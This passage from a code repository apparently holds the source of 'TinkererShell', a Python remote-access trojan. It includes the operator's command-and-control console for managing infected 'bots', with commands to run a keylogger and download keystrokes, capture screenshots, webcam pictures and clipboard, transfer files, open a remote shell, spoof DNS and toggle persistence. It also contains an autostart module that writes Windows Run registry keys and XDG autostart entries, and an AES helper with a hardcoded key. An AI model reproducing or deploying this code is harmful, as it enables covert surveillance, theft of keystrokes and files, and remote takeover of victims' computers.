exception_keylogdownloader: 299 | logging(data_to_log=str(exception_keylogdownloader), printer=True) 300 | 301 | 302 | def keylogshower(): 303 | """Show downloaded keystrokes in a tk window.\n""" 304 | local_filename = 'keylogged-{}-{}.txt'.format(connected_sockets[active_bot]['ip'], 305 | connected_sockets[active_bot]['username']).replace("\\", "").replace("/", "") 306 | try: 307 | keylogged_descriptor = open(local_filename, 'r') 308 | print(keylogged_descriptor.read()) 309 | keylogged_descriptor.close() 310 | except IOError as exception_keylogshower: 311 | if exception_keylogshower.errno == 2: 312 | # noinspection PyPep8 313 | logging( 314 | data_to_log='It looks like you never downloaded keylogged data from bot!\n Going to download it now for you...\n', 315 | printer=True) 316 | keylogdownloader() 317 | keylogshower() 318 | else: 319 | logging(data_to_log=str(exception_keylogshower), printer=True) 320 | 321 | 322 | def kill_current_bot() -> bool: 323 | # noinspection PyPep8 324 | """Terminate remote backdoor thread.\n""" 325 | global connected_sockets 326 | double_check = ask_input(phrase='Are you sure? yes/no\n') 327 | if double_check == 'yes': 328 | sender('SHkill') 329 | response = receiver() 330 | if response != 'mistochiudendo': 331 | logging(data_to_log=response, printer=True) 332 | connected_sockets[active_bot]['status'] = False 333 | return True 334 | logging(data_to_log='Operation aborted\n', printer=True) 335 | return False 336 | 337 | 338 | def quit_utility() -> bool: 339 | # noinspection PyPep8 340 | """Ask if user wants to terminate backdoor threads in connected bots and kill them, then exits.\n""" 341 | global conn 342 | global thr_exit 343 | double_check = ask_input(phrase='Are you sure? yes/no\n') 344 | if double_check == 'yes': 345 | kill_all = ask_input(phrase='Do you want to kill all the bots? yes/no\n') 346 | for bot in connected_sockets: 347 | if bot['status'] is True: 348 | conn = bot['conn'] 349 | if kill_all == 'yes': 350 | sender('SHkill') 351 | else: 352 | sender('SHquit') 353 | response = receiver() 354 | if response != 'mistochiudendo': 355 | logging(data_to_log=response, printer=True) 356 | thr_exit.set() 357 | return True 358 | logging(data_to_log='Operation aborted\n', printer=True) 359 | return False 360 | 361 | 362 | def command_executer(): 363 | CommandExecutorInput().cmdloop() 364 | 365 | 366 | def tinkerer_menu(): 367 | TinkererShellInput().cmdloop() 368 | 369 | 370 | # ================================================================================================= 371 | 372 | # noinspection PyUnusedLocal,PyUnusedLocal,PyPep8Naming,PyMethodMayBeStatic,PyMethodMayBeStatic 373 | class BotSwitcher(cmd.Cmd): 374 | """Bots selection handler.\n""" 375 | global active_bot 376 | global conn 377 | prompt = '\n(SHbots) ' 378 | 379 | # --------------------------------------------------------------------------------------------- 380 | def do_SHbots(self, option): 381 | """SHbots [option]\n\tlist: List connected bots\n\t[bot number]: Interact with target bot\n""" 382 | global active_bot 383 | global conn 384 | if option: 385 | if option == 'list': 386 | active_bots_str = '\nActive bots:' 387 | inactive_bots_str = '\n\nInactive bots:' 388 | for bots_counter, bot in enumerate(connected_sockets): 389 | if bot['status'] is True: 390 | active_bots_str += '\n\tBot # {}\t\t{}\t{}'.format(bots_counter, bot['ip'], bot['username']) 391 | else: 392 | inactive_bots_str += '\n\tBot # {}\t\t{}\t{}'.format(bots_counter, bot['ip'], bot['username']) 393 | printable_bots = active_bots_str + inactive_bots_str + '\n\n\nYou can interact with a bot using "SHbots [bot-number]"\n' 394 | logging(data_to_log=printable_bots, printer=True) 395 | elif option.isdigit() is True: 396 | try: 397 | if connected_sockets[int(option)]['status'] is True: 398 | double_check = ask_input(phrase='Are you sure? yes/no\n') 399 | if double_check == 'yes': 400 | active_bot = int(option) 401 | conn = connected_sockets[int(option)]['conn'] 402 | tinkerer_menu() 403 | else: 404 | logging(data_to_log='Selection canceled\n', printer=True) 405 | except Exception as exception_default: 406 | if str(exception_default) == 'list index out of range': 407 | logging(data_to_log='The selected bot does not exist\n', printer=True) 408 | else: 409 | logging(data_to_log=str(exception_default), printer=True) 410 | else: 411 | print('Aborted: unknown option\n') 412 | else: 413 | print('Aborted: an option is required\n') 414 | 415 | # --------------------------------------------------------------------------------------------- 416 | def do_SHquit(self, option) -> bool: 417 | """SHquit\n\tQuit and close the connection\n""" 418 | return quit_utility() 419 | 420 | def emptyline(self): 421 | pass 422 | 423 | # ============================================================================================= 424 | def precmd(self, line): 425 | logging(data_to_log=('\n(Bots) ' + line)) 426 | return cmd.Cmd.precmd(self, line) 427 | 428 | # ============================================================================================= 429 | def postloop(self): 430 | logging(data_to_log='\nQuitting!', printer=True) 431 | 432 | 433 | # ================================================================================================= 434 | 435 | # noinspection PyUnusedLocal,PyPep8Naming,PyMethodMayBeStatic 436 | class CommandExecutorInput(cmd.Cmd): 437 | """Command Executor Input handler.\n""" 438 | 439 | prompt = '\n >>> ' 440 | 441 | # --------------------------------------------------------------------------------------------- 442 | def do_SHreturn(self, option): 443 | """SHreturn\n\tReturn to TinkererShell interactive mode.\n""" 444 | logging(data_to_log='Returning to TinkererShell interactive mode...\n', printer=True) 445 | return True 446 | 447 | # --------------------------------------------------------------------------------------------- 448 | def default(self, command): 449 | if command != 'SHquit' and command != 'SHkill': 450 | sender(command) 451 | response = receiver() 452 | if response == 'reachedexcept': 453 | receiver(printer=True) 454 | else: 455 | logging(data_to_log=response, printer=True) 456 | 457 | # ============================================================================================= 458 | def precmd(self, line): 459 | logging(data_to_log=('\n >>> ' + line)) 460 | return cmd.Cmd.precmd(self, line) 461 | 462 | 463 | # ================================================================================================= 464 | # noinspection PyMethodMayBeStatic 465 | class TinkererShellInput(cmd.Cmd): 466 | """TinkererShell.\n""" 467 | 468 | prompt = '\n(SHCmd) ' 469 | 470 | # --------------------------------------------------------------------------------------------- 471 | # noinspection PyMethodMayBeStatic 472 | def do_SHprocess(self, option): 473 | """SHprocesses [option]\n\tlist: List active processes\n\tkill: Kill an active process\n""" 474 | if option: 475 | if option == 'list': 476 | sender('SHprocesslist') 477 | receiver(printer=True) 478 | elif option == 'kill': 479 | processkiller() 480 | else: 481 | print('Aborted: unknown option\n') 482 | else: 483 | print('Aborted: an option is required\n') 484 | 485 | # --------------------------------------------------------------------------------------------- 486 | def do_SHdns(self, option): 487 | """SHdns [option]\n\tstart: Start DNS spoofing\n\tstop: Stop DNS spoofing\n""" 488 | if option: 489 | if option == 'start': 490 | dnsspoofer() 491 | elif option == 'stop': 492 | sender('SHdnsstop') 493 | receiver(printer=True) 494 | else: 495 | print('Aborted: unknown option\n') 496 | else: 497 | print('Aborted: an option is required\n') 498 | 499 | # --------------------------------------------------------------------------------------------- 500 | def do_SHkeylog(self, option): 501 | # noinspection PyPep8 502 | """SHkeylog [option]\n\tstatus: Show status of the keylogger\n\tstart: Start keylogger\n\tstop: Stop keylogger\n\tdownload: Download keylogged data to local machine and delete it from remote bot\n\tshow: Show downloaded keylogged data\n""" 503 | if option: 504 | if option == 'status': 505 | sender('SHkeylogstatus') 506 | receiver(printer=True) 507 | elif option == 'start': 508 | sender('SHkeylogstart') 509 | receiver(printer=True) 510 | elif option == 'stop': 511 | sender('SHkeylogstop') 512 | receiver(printer=True) 513 | elif option == 'download': 514 | keylogdownloader() 515 | elif option == 'show': 516 | keylogshower() 517 | else: 518 | print('Aborted: unknown option\n') 519 | else: 520 | print('Aborted: an option is required\n') 521 | 522 | # --------------------------------------------------------------------------------------------- 523 | # noinspection PyUnusedLocal 524 | def do_SHscreenshot(self, option): 525 | """SHscreenshot\n\tGrab a screenshot of the whole screen (multiple monitors supported)\n""" 526 | screenshot() 527 | 528 | # --------------------------------------------------------------------------------------------- 529 | # noinspection PyUnusedLocal 530 | def do_SHwebcampic(self, option): 531 | """SHwebcampic\n\tGrab a picture using the webcam of the remote host\n""" 532 | webcam_pic() 533 | 534 | # --------------------------------------------------------------------------------------------- 535 | # noinspection PyUnusedLocal 536 | def do_SHclipboard(self, option): 537 | """SHwebcampic\n\tGrab a picture using the webcam of the remote host\n""" 538 | clip_copy() 539 | 540 | # --------------------------------------------------------------------------------------------- 541 | # noinspection PyUnusedLocal 542 | def do_SHdownload(self, option): 543 | """SHdownload\n\tDownload a file\n""" 544 | downloader() 545 | 546 | # --------------------------------------------------------------------------------------------- 547 | # noinspection PyUnusedLocal 548 | def do_SHupload(self, option): 549 | """SHupload\n\tUpload a file\n""" 550 | uploader() 551 | 552 | # --------------------------------------------------------------------------------------------- 553 | # noinspection PyUnusedLocal 554 | def do_SHexec(self, option): 555 | """SHexec\n\tUse remote system command shell\n""" 556 | command_executer() 557 | 558 | # --------------------------------------------------------------------------------------------- 559 | def do_SHpersistence(self, option): 560 | # noinspection PyPep8 561 | """"SHpersistence [option]\n\tstatus: Show status of the persistence module\n\tenable: Enable persistence installation\n\tdisable: Disable persistence installation\n""" 562 | if option == 'enable': 563 | sender('SHpersistenceenable') 564 | receiver(printer=True) 565 | elif option == 'disable': 566 | sender('SHpersistencedisable') 567 | receiver(printer=True) 568 | elif option == 'status': 569 | sender('SHpersistencestatus') 570 | receiver(printer=True) 571 | else: 572 | print('Aborted: unknown option\n') 573 | 574 | # --------------------------------------------------------------------------------------------- 575 | # noinspection PyUnusedLocal 576 | def do_SHreturn(self, option): 577 | """SHreturn\n\tReturn to TinkererShell bot selection mode.\n""" 578 | logging(data_to_log='Returning to TinkererShell bot selection mode...\n', printer=True) 579 | return True 580 | 581 | # noinspection PyUnusedLocal 582 | def do_SHkill(self, option): 583 | """SHkill\n\tKill current bot and return to TinkererShell bot selection mode.\n""" 584 | return kill_current_bot() 585 | 586 | # --------------------------------------------------------------------------------------------- 587 | def emptyline(self): 588 | pass 589 | 590 | # ============================================================================================= 591 | def precmd(self, line): 592 | logging(data_to_log=('\n(Cmd) ' + line)) 593 | return cmd.Cmd.precmd(self, line) 594 | 595 | 596 | # =============================================================================================#============================================================================================= 597 | if __name__ == '__main__': 598 | """Main function.\n""" 599 | 600 | # Setup sessionlog.txt file where I am gonna log all console output 601 | if os.path.isfile('sessionlog.txt') and not os.access('sessionlog.txt', os.W_OK): 602 | chiusura = input( 603 | '[-] sessionlog.txt access to log file denied.\nTry running this program as root... Press Enter to ' 604 | 'exit...') 605 | sys.exit(0) 606 | try: 607 | f = open('sessionlog.txt', 'a') 608 | f.write( 609 | '\n\n\n\n\n' + datetime.datetime.now().strftime("%Y-%m-%d %H:%M") + '\n[*] Start of session\'s logs [*]\n') 610 | f.close() 611 | except Exception as exception: 612 | print(exception) 613 | 614 | threading.Thread(target=connection_gate).start() 615 | 616 | sleep(5) 617 | # Start command loop 618 | BotSwitcher().cmdloop() 619 | -------------------------------------------------------------------------------- /modules/autorun.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | """A simple crossplatform autostart helper""" 3 | 4 | # Module for autostart written by Jonas Wagner 5 | # http://29a.ch/2009/3/17/autostart-autorun-with-python 6 | 7 | # Example: 8 | # import os 9 | # import autorun 10 | # autorun.add("myapp", os.path.abspath(__file__)) 11 | 12 | from __future__ import with_statement 13 | 14 | import os 15 | import sys 16 | 17 | if sys.platform == 'win32': 18 | import _winreg 19 | _registry = _winreg.ConnectRegistry(None, _winreg.HKEY_CURRENT_USER) 20 | def get_runonce(): 21 | return _winreg.OpenKey(_registry, 22 | r"Software\Microsoft\Windows\CurrentVersion\Run", 0, 23 | _winreg.KEY_ALL_ACCESS) 24 | 25 | def add(name, application): 26 | """add a new autostart entry""" 27 | key = get_runonce() 28 | _winreg.SetValueEx(key, name, 0, _winreg.REG_SZ, application) 29 | _winreg.CloseKey(key) 30 | 31 | def exists(name): 32 | """check if an autostart entry exists""" 33 | key = get_runonce() 34 | exists = True 35 | try: 36 | _winreg.QueryValueEx(key, name) 37 | except WindowsError: 38 | exists = False 39 | _winreg.CloseKey(key) 40 | return exists 41 | 42 | def remove(name): 43 | """delete an autostart entry""" 44 | key = get_runonce() 45 | _winreg.DeleteValue(key, name) 46 | _winreg.CloseKey(key) 47 | else: 48 | _xdg_config_home = os.environ.get("XDG_CONFIG_HOME", "~/.config") 49 | _xdg_user_autostart = os.path.join(os.path.expanduser(_xdg_config_home), 50 | "autostart") 51 | 52 | def getfilename(name): 53 | """get the filename of an autostart (.desktop) file""" 54 | return os.path.join(_xdg_user_autostart, name + ".desktop") 55 | 56 | def add(name, application): 57 | """add a new autostart entry""" 58 | desktop_entry = "[Desktop Entry]\n"\ 59 | "Name=%s\n"\ 60 | "Exec=%s\n"\ 61 | "Type=Application\n"\ 62 | "Terminal=false\n" % (name, application) 63 | with open(getfilename(name), "w") as f: 64 | f.write(desktop_entry) 65 | 66 | def exists(name): 67 | """check if an autostart entry exists""" 68 | return os.path.exists(getfilename(name)) 69 | 70 | def remove(name): 71 | """delete an autostart entry""" 72 | os.unlink(getfilename(name)) 73 | 74 | def test(): 75 | assert not exists("test_xxx") 76 | try: 77 | add("test_xxx", "test") 78 | assert exists("test_xxx") 79 | finally: 80 | remove("test_xxx") 81 | assert not exists("test_xxx") 82 | 83 | if __name__ == "__main__": 84 | test() 85 | -------------------------------------------------------------------------------- /modules/my_crypt_func.py: -------------------------------------------------------------------------------- 1 | # Written By Ananke: https://github.com/4n4nk3 2 | 3 | import json 4 | # pycryptodome 5 | from Crypto.Cipher import AES 6 | from base64 import b64encode, b64decode 7 | 8 | def encode_aes(text_input: str) -> str: 9 | """Encode a string and output an json in string form.\n""" 10 | secret = b'4n4nk353hlli5w311d0n3andI1ik3it!' 11 | cipher = AES.new(secret, AES.MODE_EAX) 12 | ciphertext, tag = cipher.encrypt_and_digest(bytes(text_input, 'utf-8')) 13 | lista = [ciphertext, tag, cipher.nonce] 14 | json_k = ['ciphertext', 'tag', 'nonce'] 15 | json_v = [b64encode(x).decode('utf-8') for x in lista] 16 | return json.dumps(dict(zip(json_k, json_v))) 17 | 18 | 19 | def decode_aes(json_input: str) -> str: 20 | """Decode a string in json form and output a string.\n""" 21 | try: 22 | b64 = json.loads(json_input) 23 | json_k = ['ciphertext', 'tag', 'nonce'] 24 | jv = {k: b64decode(b64[k]) for k in json_k} 25 | secret = b'4n4nk353hlli5w311d0n3andI1ik3it!' 26 | cipher = AES.new(secret, AES.MODE_EAX, nonce=jv['nonce']) 27 | cleared = (cipher.decrypt_and_verify(jv['ciphertext'], jv['tag'])).decode('utf-8') 28 | return cleared 29 | except Exception as exception_decode: 30 | print(exception_decode) 31 | print("Incorrect decryption") -------------------------------------------------------------------------------- /modules/my_logger.py: -------------------------------------------------------------------------------- 1 | # Written By Ananke: https://github.com/4n4nk3 2 | import datetime 3 | 4 | def logging(data_to_log: str, printer=False) -> bool: 5 | """Log data passed as argument and if needed print it also to the console.\n""" 6 | if printer is True: 7 | print(data_to_log) 8 | try: 9 | log_descriptor = open('sessionlog.txt', 'a') 10 | log_descriptor.write('\n' + datetime.datetime.now().strftime("%Y-%m-%d %H:%M") + '\n' + data_to_log) 11 | log_descriptor.close() 12 | except Exception as exception_logging: 13 | print(exception_logging) 14 | return True 15 | -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | Pillow 2 | pyperclip 3 | opencv-python 4 | pyscreenshot 5 | pycryptodome 6 | pyxhook 7 | tendo 8 | --------------------------------------------------------------------------------